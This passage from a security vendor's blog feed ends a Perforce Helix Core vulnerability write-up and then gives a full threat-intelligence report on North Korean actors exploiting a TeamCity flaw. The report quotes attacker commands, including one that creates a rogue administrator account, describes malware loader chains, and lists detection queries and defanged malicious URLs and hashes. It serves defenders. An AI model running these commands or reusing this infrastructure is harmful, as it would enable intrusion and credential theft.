As previously discussed, RPC messages sent from the client to the server contain the RPC function name and can optionally contain RPC function arguments. In the code above, StrDict::GetVar() is used to get the client’s RPC function arguments from the pRpc object. If the given argument name was not provided in the client’s RPC message, then StrDict::GetVar() returns zero. In the first line above, StrDict::GetVar() is used to get the value of the user RPC function argument. However, if the user (or attacker) does not specify a value for user in their RPC message then pStrPtrUser gets set to zero. In the last line above, we see pStrPtrUser passed as the second argument to StrOps::PackOctet(), (the source code for which is available in the client source code discussed above):

Screenshot of code from strbuf.h
Figure 12. Source code snippets from strbuf.h
Screenshot of code from strbuf.cc
Figure 13. Source code snippet from strbuf.cc
Screenshot of code from strops.cc
Figure 14. Source code snippet from strops.cc

As can be seen in the code above, when StrOps::PackOctet() is called with zero as the value for s, StrBuf::Append() gets called with zero as the value for t. This results in StrBuf::Append() trying to dereference the length field of t, where the buffer field of t is at offset 0 relative to the beginning of the t object and the length field of t is at offset 8 relative to the beginning of the t object (since char *buffer is 64-bits). When the value of t is 0, dereferencing length leads to reading from virtual memory address 0x0000000000000008, which results in a read-access violation or segmentation fault. We found that these types of exceptions are not handled gracefully by the server and that such read-exceptions cause the entire server process to crash and not restart. This DoS attack is exploitable by remote unauthenticated attackers.

This vulnerability is now identified as CVE-2023-45319 and it has a CVSS score of 7.5.

Coordinated disclosure

Microsoft reported these four security vulnerabilities to the vendor Perforce at the end of August 2023. Immediately afterwards, on September 1, Perforce acknowledged these four vulnerabilities and began work to investigate and remediate them. Throughout September and October, Perforce communicated status updates to Microsoft on implementing fixes and putting those fixes through their QA processes. Perforce reserved CVE IDs on October 24, 2023, shared those IDs with Microsoft on October 25, 2023, and informed Microsoft at that time that the patches would be published by mid-November 2023. On November 7, 2023, Perforce published Perforce Helix Core Server version 2023.1/2513900, which mitigates these four vulnerabilities. Perforce has also published patches for the older Perforce Helix Core Server versions 2022.2, 2022.1, and 2021.2. Perforce recommends upgrading to the latest Perforce Helix Core Server version 2023.2.

Microsoft would like to thank Perforce for their professionalism and for their rapid response in addressing these security vulnerabilities. Microsoft is grateful for this partnership and for Perforce’s commitment to security.

Mitigation and protection guidance

Microsoft is not aware of any adversaries exploiting these vulnerabilities, but mitigations should be applied by all Helix Core Server customers as soon as possible.

Risk detection

Extend vulnerability and risk detection beyond the firewall with platforms like Microsoft Defender External Attack Surface Management. Customers can identify internet-exposed infrastructure running Perforce Helix Core Server in their inventory and use the insights tile under the Attack Surface Summary dashboard to surface assets vulnerable to CVE-2023-5759, CVE-2023-45849, CVE-2023-35767, and CVE-2023-45319.

What to do now if you’re affected

Update your Perforce Helix Core Server: https://www.perforce.com/downloads/helix-core-p4d.

Defense-in-depth

In addition to following Perforce’s guidance on “Securing the server”, Microsoft recommends adhering to the following defense-in-depth tactics to minimize the risk of exploitation of these or other Perforce Helix Core Server vulnerabilities.

  • Regularly monitor for and apply patches for third-party software.
  • Use a VPN and/or an IP allow-list to limit who can communicate with your Perforce Helix Core Server.
  • Issue TLS certificates to legitimate Perforce users and use a TLS termination proxy in front of Perforce Helix Core Server to validate client’s TLS certificates before allowing them to connect to Perforce Server.
  • Log all access to your Helix Core Server, both via your network appliances and via Perforce Helix Core Server itself.
  • Configure alerting to notify IT administrators and your security team if the Helix Core Server process crashes.
  • Use network segmentation to ensure that if your Helix Core Server is compromised, an attacker’s ability to pivot in your network is limited.

Appendix

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft 365 Defender Threat analytics 

Jason Geffner

Microsoft Threat Intelligence Community

References

Acknowledgments

Microsoft would like to recognize https://www.keysight.com/blogs/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce for previous work done in analyzing Perforce’s RPC protocol.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on Twitter at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Patching Perforce perforations: Critical RCE vulnerability discovered in Perforce Helix Core Server appeared first on Microsoft Security Blog.

]]>
Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability http://approjects.co.za/?big=en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ Wed, 18 Oct 2023 16:30:00 +0000 Since early October 2023, Microsoft has observed North Korean nation-state threat actors Diamond Sleet and Onyx Sleet exploiting the Jet Brains TeamCity CVE-2023-42793 remote-code execution vulnerability. Given supply chain attacks carried out by these threat actors in the past, Microsoft assesses that this activity poses a particularly high risk to organizations who are affected.

The post Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability appeared first on Microsoft Security Blog.

]]>
Since early October 2023, Microsoft has observed two North Korean nation-state threat actors – Diamond Sleet and Onyx Sleet – exploiting CVE-2023-42793, a remote-code execution vulnerability affecting multiple versions of JetBrains TeamCity server. TeamCity is a continuous integration/continuous deployment (CI/CD) application used by organizations for DevOps and other software development activities.

In past operations, Diamond Sleet and other North Korean threat actors have successfully carried out software supply chain attacks by infiltrating build environments. Given this, Microsoft assesses that this activity poses a particularly high risk to organizations who are affected. JetBrains has released an update to address this vulnerability and has developed a mitigation for users who are unable to update to the latest software version.

While the two threat actors are exploiting the same vulnerability, Microsoft observed Diamond Sleet and Onyx Sleet utilizing unique sets of tools and techniques following successful exploitation. Based on the profile of victim organizations affected by these intrusions, Microsoft assesses that the threat actors may be opportunistically compromising vulnerable servers. However, both actors have deployed malware and tools and utilized techniques that may enable persistent access to victim environments.

As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised and provides them with the information they need to secure their environments.

Who are Diamond Sleet and Onyx Sleet?

Diamond Sleet (ZINC) is a North Korean nation-state threat actor that prioritizes espionage, data theft, financial gain, and network destruction. The actor typically targets media, IT services, and defense-related entities around the world. Microsoft reported on Diamond Sleet’s targeting of security researchers in January 2021 and the actor’s weaponizing of open-source software in September 2022. In August 2023, Diamond Sleet conducted a software supply chain compromise of a German software provider.

Onyx Sleet (PLUTONIUM) is a North Korean nation-state threat actor that primarily targets defense and IT services organizations in South Korea, the United States, and India. Onyx Sleet employs a robust set of tools that they have developed to establish persistent access to victim environments and remain undetected. The actor frequently exploits N-day vulnerabilities as a means of gaining initial access to targeted organizations.

Diamond Sleet attack path 1: Deployment of ForestTiger backdoor

Following the successful compromise of TeamCity servers, Diamond Sleet utilizes PowerShell to download two payloads from legitimate infrastructure previously compromised by the threat actor. These two payloads, Forest64.exe and 4800-84DC-063A6A41C5C are stored in the C:\ProgramData directory.

When launched, Forest64.exe checks for the presence of the file named 4800-84DC-063A6A41C5C, then reads and decrypts the contents of that file using embedded, statically assigned key of ‘uTYNkfKxHiZrx3KJ’:

c:\ProgramData\Forest64.exe  uTYNkfKxHiZrx3KJ

Interestingly, this same value is specified as a parameter when the malware is invoked, but we did not see it utilized during our analysis. The same value and configuration name was also referenced in historical activity reported by Kaspersky’s Securelist on this malware, dubbed ForestTiger.

The decrypted content of 4800-84DC-063A6A41C5C is the configuration file for the malware, which contains additional parameters, such as the infrastructure used by the backdoor for command and control (C2). Microsoft observed Diamond Sleet using infrastructure previously compromised by the actor for C2.

Microsoft observed Forest64.exe then creating a scheduled task named Windows TeamCity Settings User Interface so it runs every time the system starts with the above referenced command parameter “uTYNkfKxHiZrx3KJ”. Microsoft also observed Diamond Sleet leveraging the ForestTiger backdoor to dump credentials via the LSASS memory. Microsoft Defender Antivirus detects this malware as ForestTiger.

diagram
Figure 1. Diamond Sleet attack chain 1 using ForestTiger backdoor

Diamond Sleet attack path 2: Deploying payloads for use in DLL search-order hijacking attacks

Diamond Sleet leverages PowerShell on compromised servers to download a malicious DLL from attacker infrastructure. This malicious DLL is then staged in C:\ProgramData\ alongside a legitimate .exe file to carry out DLL search-order hijacking. Microsoft has observed these malicious DLL and legitimate EXE combinations used by the actor:

Malicious DLL nameLegitimate binary name
DSROLE.dllwsmprovhost.exe
Version.dllclip.exe

DSROLE.dll attack chain

When DSROLE.dll is loaded by wsmprovhost.exe, the DLL initiates a thread that enumerates and attempts to process files that exist in the same executing directory as the DLL. The first four bytes of candidate files are read and signify the size of the remaining buffer to read. Once the remaining data is read back, the bytes are reversed to reveal an executable payload that is staged in memory. The expected PE file should be a DLL with the specific export named ‘StartAction’. The address of this export is resolved and then launched in memory.

While the functionality of DSROLE.dll is ultimately decided by whatever payloads it deobfuscates and launches, Microsoft has observed the DLL being used to launch wksprt.exe, which communicates with C2 domains. Microsoft Defender Antivirus detects DSROLE.dll using the family name RollSling.

Version.dll attack chain

When loaded by clip.exe, Version.dll loads and decrypts the contents of readme.md, a file  downloaded alongside Version.dll from attacker-compromised infrastructure. The file readme.md contains data that is used as a multibyte XOR key to decrypt position-independent code (PIC) embedded in Version.dll. This PIC loads and launches the final-stage remote access trojan (RAT).

Screenshot of readme.md
Figure 2. Composition of readme.md used as multibyte XOR key by Version.dll
Screenshot of XOR key
Figure 3. Application of XOR key to expose next-stage code block
Screenshot of embedded PE from code block
Figure 4. Carving out embedded PE from code block

Once loaded in memory, the second-stage executable decrypts an embedded configuration file containing several URLs used by the malware for command and control. Shortly after the malware beacons to the callback URL, Microsoft has observed a separate process iexpress.exe created and communicating with other C2 domains. Microsoft Defender Antivirus detects Version.dll using the family name FeedLoad.

diagram
Figure 5. Diamond Sleet attack chain 2 using DLL search order hijacking

After successful compromise, Microsoft observed Diamond Sleet dumping credentials via the LSASS memory.

In some cases, Microsoft observed Diamond Sleet intrusions that utilized tools and techniques from both paths 1 and 2.

Onyx Sleet attack path: User account creation, system discovery, and payload deployment

Following successful exploitation using the TeamCity exploit, Onyx Sleet creates a new user account on compromised systems. This account, named krtbgt, is likely intended to impersonate the legitimate Windows account name KRBTGT, the Kerberos Ticket Granting Ticket. After creating the account, the threat actor adds it to the Local Administrators Group through net use:

net  localgroup administrators krtbgt /add

The threat actor also runs several system discovery commands on compromised systems, including:

net localgroup 'Remote Desktop Users’
net localgroup Administrators
cmd.exe "/c tasklist | findstr Sec"
cmd.exe "/c whoami"
cmd.exe "/c netstat -nabp tcp"
cmd.exe "/c ipconfig /all"
cmd.exe "/c systeminfo"

Next, the threat actor deploys a unique payload to compromised systems by downloading it from attacker-controlled infrastructure via PowerShell. Microsoft observed these file paths for the unique payload:

  • C:\Windows\Temp\temp.exe
  • C:\Windows\ADFS\bg\inetmgr.exe

This payload, when launched, loads and decrypts an embedded PE resource. This decrypted payload is then loaded into memory and launched directly. The inner payload is a proxy tool that helps establish a persistent connection between the compromised host and attacker-controlled infrastructure. Microsoft Defender Antivirus detects this proxy tool as HazyLoad.

Microsoft also observed the following post-compromise tools and techniques leveraged in this attack path:

  • Using the attacker-controlled krtbgt account to sign into the compromised device via remote desktop protocol (RDP)
  • Stopping the TeamCity service, likely in an attempt to prevent access by other threat actors
  • Dumping credentials via the LSASS memory
  • Deploying tools to retrieve credentials and other data stored by browsers
diagram
Figure 6. Onyx Sleet attack chain with user account creation

Microsoft recommends the following mitigations to reduce the impact of this threat.

  • Apply the update or mitigations released by JetBrains to address CVE-2023-42793.
  • Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
  • Block in-bound traffic from IPs specified in the IOC table.
  • Use Microsoft Defender Antivirus to protect from this threat. Turn on cloud-delivered protection and automatic sample submission. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Take immediate action to address malicious activity on the impacted device. If malicious code has been launched, the attacker has likely taken complete control of the device. Immediately isolate the system and perform a reset of credentials and tokens.
  • Investigate the device timeline for indications of lateral movement activities using one of the compromised accounts. Check for additional tools that attackers might have dropped to enable credential access, lateral movement, and other attack activities.
  • Ensure that “Safe DLL Search Mode” is set.
  • Turn on the following attack surface reduction rule:
    • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Detections

Microsoft 365 Defender

Microsoft 365 Defender is becoming Microsoft Defender XDR. Learn more.

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the CVE-2023-42793 vulnerability leveraged in these attacks.

Microsoft Defender Antivirus

Microsoft Defender Antivirus customers should look for the following family names for activity related to these attacks:

  • ForestTiger
  • RollSling
  • FeedLoad
  • HazyLoad

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts could indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

  • Diamond Sleet Actor activity detected
  • Onyx Sleet Actor activity detected
  • Possible exploitation of JetBrains TeamCity vulnerability
  • Suspicious behavior by cmd.exe was observed
  • Suspicious DLL loaded by an application
  • Suspicious PowerShell download or encoded command execution
  • Possible lateral movement involving suspicious file
  • A script with suspicious content was observed
  • Suspicious scheduled task

Hunting queries

Microsoft 365 Defender

Command and control using iexpress.exe or wksprt.exe

DeviceNetworkEvents
| where (InitiatingProcessFileName =~ "wksprt.exe" and InitiatingProcessCommandLine == "wksprt.exe") 
or (InitiatingProcessFileName =~ "iexpress.exe" and InitiatingProcessCommandLine == "iexpress.exe")

Search order hijack using Wsmprovhost.exe and DSROLE.dll

DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "wsmprovhost.exe"
| where FileName =~ "DSROLE.dll"
| where not(FolderPath has_any("system32", "syswow64"))

Search order hijack using clip.exe and Version.dll

DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "clip.exe"
| where FileName in~("version.dll")
| where not(FolderPath has_any("system32", "syswow64", "program files", "windows defender\\platform", "winsxs", "platform",
"trend micro"))

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.  

Indicators of compromise (IOCs)

The list below provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

Diamond Sleet path 1

IndicatorTypeDescription
C:\ProgramData\Forest64.exe                                                              File pathFile path of ForestTiger binary
e06f29dccfe90ae80812c2357171b5c48fba189ae103d28e972067b107e58795SHA-256Hash of Forest64.exe
0be1908566efb9d23a98797884f2827de040e4cedb642b60ed66e208715ed4aaSHA-256Hash of Forest64.exe
C:\ProgramData\4800-84DC-063A6A41C5CFile pathForestTiger configuration file
hxxp://www.bandarpowder[.]com/public/assets/img/cfg.pngURLStaging URL for 4800-84DC-063A6A41C5C (compromised domain)
hxxps://www.bandarpowder[.]com/public/assets/img/cfg.pngURLStaging URL for 4800-84DC-063A6A41C5C (compromised domain)
hxxp://www.aeon-petro[.]com/wcms/plugins/addition_contents/cfg.pngURLStaging URL for 4800-84DC-063A6A41C5C (compromised domain)
hxxp://www.bandarpowder[.]com/public/assets/img/user64.pngURLStaging URL for Forest64.exe (compromised domain)
hxxps://www.bandarpowder[.]com/public/assets/img/user64.pngURLStaging URL for Forest64.exe (compromised domain)
hxxp://www.aeon-petro[.]com/wcms/plugins/addition_contents/user64.pngURLStaging URL for Forest64.exe (compromised domain)

Diamond Sleet path 2

IndicatorTypeDescription
C:\ProgramData\DSROLE.dllFile pathFile path of RollSling binary  
d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeacaSHA-256Hash of DSROLE.dll
C:\ProgramData\Version.dllFile path  File path of FeedLoad binary.
f251144f7ad0be0045034a1fc33fb896e8c32874e0b05869ff5783e14c062486SHA-256Hash of Version.dll
C:\ProgramData\readme.mdFile path  Used as a multibyte XOR key for FeedLoad Next Stage
fa7f6ac04ec118dd807c1377599f9d369096c6d8fb1ed24ac7a6ec0e817eaab6SHA-256Hash of Readme.md
C:\ProgramData\wsmprovhost.exeFile pathLegitimate Windows binary is copied to this directory for DLL search-order hijacking
C:\ProgramData\clip.exeFile pathLegitimate Windows binary is copied to this directory for DLL search-order hijacking
dersmarketim[.]comDomainC2 domain (compromised domain)
olidhealth[.]comDomainC2 domain (compromised domain)
galerielamy[.]comDomainC2 domain (compromised domain)
3dkit[.]orgDomainC2 domain (compromised domain)
hxxp://www.mge[.]sn/themes/classic/modules/ps_rssfeed/feed.zipURLStaging URL for Version.dll (compromised domain)
hxxp://www.mge[.]sn/themes/classic/modules/ps_rssfeed/feedmd.zipURLStaging URL for readme.md (compromised domain)
hxxps://vadtalmandir[.]org/admin/ckeditor/plugins/icontact/about.phpURLCallback URL from second-stage PE (compromised domain)
hxxps://commune-fraita[.]ma/wp-content/plugins/wp-contact/contact.phpURLCallback URL from second-stage PE (compromised domain)

Onyx Sleet path

IndicatorTypeDescription
C:\Windows\Temp\temp.exeFile pathFile path for HazyLoad binary
C:\Windows\ADFS\bg\inetmgr.exeFile pathFile path for HazyLoad binary
000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eeeSHA-256Hash of proxy tool loader
hxxp://147.78.149[.]201:9090/imgr.icoURLStaging URL for HazyLoad binary (compromised infrastructure)
hxxp://162.19.71[.]175:7443/bottom.gifURLStaging URL for HazyLoad binary (compromised infrastructure)

NOTE: These indicators should not be considered exhaustive for this observed activity.

References

Further reading

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on Twitter at https://twitter.com/MsftSecIntel.

The post Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability appeared first on Microsoft Security Blog.

]]>